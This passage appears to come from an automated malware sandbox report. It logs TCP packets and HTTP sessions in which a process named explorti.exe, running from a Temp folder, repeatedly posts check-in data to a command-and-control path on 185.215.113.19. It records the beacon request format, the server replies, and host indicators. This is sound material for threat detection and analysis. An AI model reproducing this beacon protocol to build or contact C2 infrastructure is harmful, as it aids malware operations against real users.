Jul 27, 2024 06:34:42.487307072 CEST	62264	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:42.604353905 CEST	62264	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:42.604542017 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:42.609596014 CEST	80	62265	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:42.609694958 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:42.609823942 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:42.609886885 CEST	80	62264	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:42.609951019 CEST	62264	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:42.614579916 CEST	80	62265	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:43.384181976 CEST	80	62265	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:43.384387016 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:43.385694981 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:43.697500944 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:44.306819916 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:44.451456070 CEST	80	62265	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:44.451752901 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:44.454351902 CEST	80	62265	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:44.454413891 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:44.457325935 CEST	80	62265	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:44.457386017 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:44.694750071 CEST	80	62265	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:44.694768906 CEST	80	62265	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:44.694782019 CEST	80	62265	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:44.942445993 CEST	80	62265	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:44.942528009 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:45.057727098 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:45.058104038 CEST	62266	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:45.062858105 CEST	80	62266	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:45.062915087 CEST	80	62265	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:45.062944889 CEST	62266	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:45.062978983 CEST	62265	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:45.063122988 CEST	62266	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:45.067958117 CEST	80	62266	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:45.824762106 CEST	80	62266	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:45.825017929 CEST	62266	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:45.825720072 CEST	62266	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:45.830534935 CEST	80	62266	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:46.076818943 CEST	80	62266	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:46.077099085 CEST	62266	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:46.184863091 CEST	62266	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:46.185354948 CEST	62267	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:46.192584038 CEST	80	62266	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:46.192600965 CEST	80	62267	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:46.192651033 CEST	62266	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:46.192692041 CEST	62267	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:46.192828894 CEST	62267	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:46.197585106 CEST	80	62267	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:46.963485003 CEST	80	62267	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:46.963993073 CEST	62267	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:46.964488029 CEST	62267	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:46.969598055 CEST	80	62267	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:47.257478952 CEST	80	62267	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:47.257678986 CEST	62267	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:47.370160103 CEST	62267	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:47.370264053 CEST	62268	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:47.375777006 CEST	80	62268	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:47.375917912 CEST	62268	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:47.376010895 CEST	62268	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:47.376528978 CEST	80	62267	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:47.376591921 CEST	62267	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:47.380937099 CEST	80	62268	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:48.142162085 CEST	80	62268	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:48.142241955 CEST	62268	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:48.142843008 CEST	62268	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:48.147685051 CEST	80	62268	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:48.392684937 CEST	80	62268	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:48.392816067 CEST	62268	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:48.494738102 CEST	62268	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:48.495095015 CEST	62269	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:48.499943018 CEST	80	62269	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:48.500013113 CEST	62269	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:48.500091076 CEST	62269	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:48.500097990 CEST	80	62268	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:48.500153065 CEST	62268	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:48.504868984 CEST	80	62269	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:49.277554989 CEST	80	62269	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:49.277853966 CEST	62269	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:49.279108047 CEST	62269	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:49.284269094 CEST	80	62269	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:49.534980059 CEST	80	62269	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:49.535166025 CEST	62269	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:49.651110888 CEST	62269	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:49.651269913 CEST	62270	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:49.658176899 CEST	80	62270	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:49.658272028 CEST	62270	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:49.658344984 CEST	62270	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:49.658919096 CEST	80	62269	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:49.658966064 CEST	62269	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:49.663446903 CEST	80	62270	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:50.406088114 CEST	80	62270	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:50.406352043 CEST	62270	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:50.407104969 CEST	62270	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:50.412228107 CEST	80	62270	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:50.654135942 CEST	80	62270	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:50.654427052 CEST	62270	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:50.760654926 CEST	62270	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:50.760694027 CEST	62271	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:50.766077042 CEST	80	62271	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:50.766282082 CEST	62271	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:50.766282082 CEST	62271	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:50.766642094 CEST	80	62270	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:50.766699076 CEST	62270	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:50.772058010 CEST	80	62271	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:51.507561922 CEST	80	62271	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:51.507756948 CEST	62271	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:51.508218050 CEST	62271	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:51.513075113 CEST	80	62271	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:51.754733086 CEST	80	62271	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:51.754930973 CEST	62271	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:51.870090961 CEST	62271	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:51.870373011 CEST	62272	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:51.875475883 CEST	80	62271	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:51.875488997 CEST	80	62272	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:51.875565052 CEST	62272	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:51.875659943 CEST	62271	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:51.875848055 CEST	62272	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:51.880686045 CEST	80	62272	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:52.632122040 CEST	80	62272	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:52.632580042 CEST	62272	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:52.636024952 CEST	62272	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:52.640825987 CEST	80	62272	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:52.883419037 CEST	80	62272	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:52.883908987 CEST	62272	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:52.994903088 CEST	62272	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:52.995219946 CEST	62273	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:53.001039028 CEST	80	62273	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:53.001105070 CEST	62273	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:53.001236916 CEST	62273	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:53.001473904 CEST	80	62272	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:53.001549006 CEST	62272	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:53.006700039 CEST	80	62273	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:53.762206078 CEST	80	62273	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:53.762279034 CEST	62273	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:53.763067961 CEST	62273	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:53.767971992 CEST	80	62273	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:54.010139942 CEST	80	62273	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:54.010196924 CEST	62273	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:54.120547056 CEST	62273	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:54.121146917 CEST	62274	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:54.126061916 CEST	80	62273	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:54.126074076 CEST	80	62274	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:54.126116037 CEST	62273	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:54.126135111 CEST	62274	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:54.126255035 CEST	62274	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:54.131028891 CEST	80	62274	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:54.903508902 CEST	80	62274	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:54.903613091 CEST	62274	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:54.904967070 CEST	62274	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:54.909714937 CEST	80	62274	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:55.157058954 CEST	80	62274	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:55.157134056 CEST	62274	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:55.266395092 CEST	62274	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:55.266853094 CEST	62275	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:55.271552086 CEST	80	62274	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:55.271608114 CEST	62274	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:55.271656036 CEST	80	62275	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:55.271729946 CEST	62275	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:55.274720907 CEST	62275	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:55.279476881 CEST	80	62275	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:56.040918112 CEST	80	62275	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:56.041337013 CEST	62275	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:56.042365074 CEST	62275	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:56.047426939 CEST	80	62275	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:56.371234894 CEST	80	62275	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:56.371934891 CEST	62275	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:56.604434013 CEST	62276	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:56.604432106 CEST	62275	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:56.698090076 CEST	80	62276	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:56.699286938 CEST	80	62275	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:56.699510098 CEST	62275	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:56.699549913 CEST	62276	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:56.699549913 CEST	62276	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:56.704643965 CEST	80	62276	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:57.468698025 CEST	80	62276	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:57.471730947 CEST	62276	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:57.472348928 CEST	62276	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:57.477288008 CEST	80	62276	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:57.722233057 CEST	80	62276	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:57.722316027 CEST	62276	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:57.844325066 CEST	62276	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:57.845072985 CEST	62277	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:57.851870060 CEST	80	62277	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:57.852024078 CEST	62277	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:57.852322102 CEST	62277	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:57.853671074 CEST	80	62276	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:57.854029894 CEST	62276	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:57.858622074 CEST	80	62277	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:58.615835905 CEST	80	62277	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:58.616225004 CEST	62277	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:58.617325068 CEST	62277	80	192.168.2.4	185.215.113.19
Jul 27, 2024 06:34:58.622329950 CEST	80	62277	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:58.863245964 CEST	80	62277	185.215.113.19	192.168.2.4
Jul 27, 2024 06:34:58.863429070 CEST	62277	80	192.168.2.4	185.215.113.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 06:33:15.533081055 CEST	53	54885	1.1.1.1	192.168.2.4

HTTP Request Dependency Graph

185.215.113.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	62232	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:03.701400042 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:04.459923983 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:04.464155912 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:04.715233088 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	62233	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:04.829284906 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:05.609453917 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:05.610826969 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:05.862864971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	62234	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:05.985200882 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:06.722413063 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:06.723232985 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:06.968635082 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	62235	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:07.079056978 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:07.828514099 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:07.829538107 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:08.077671051 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	62236	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:08.189399958 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:09.146491051 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:09.147638083 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:09.402754068 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	62237	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:09.515912056 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
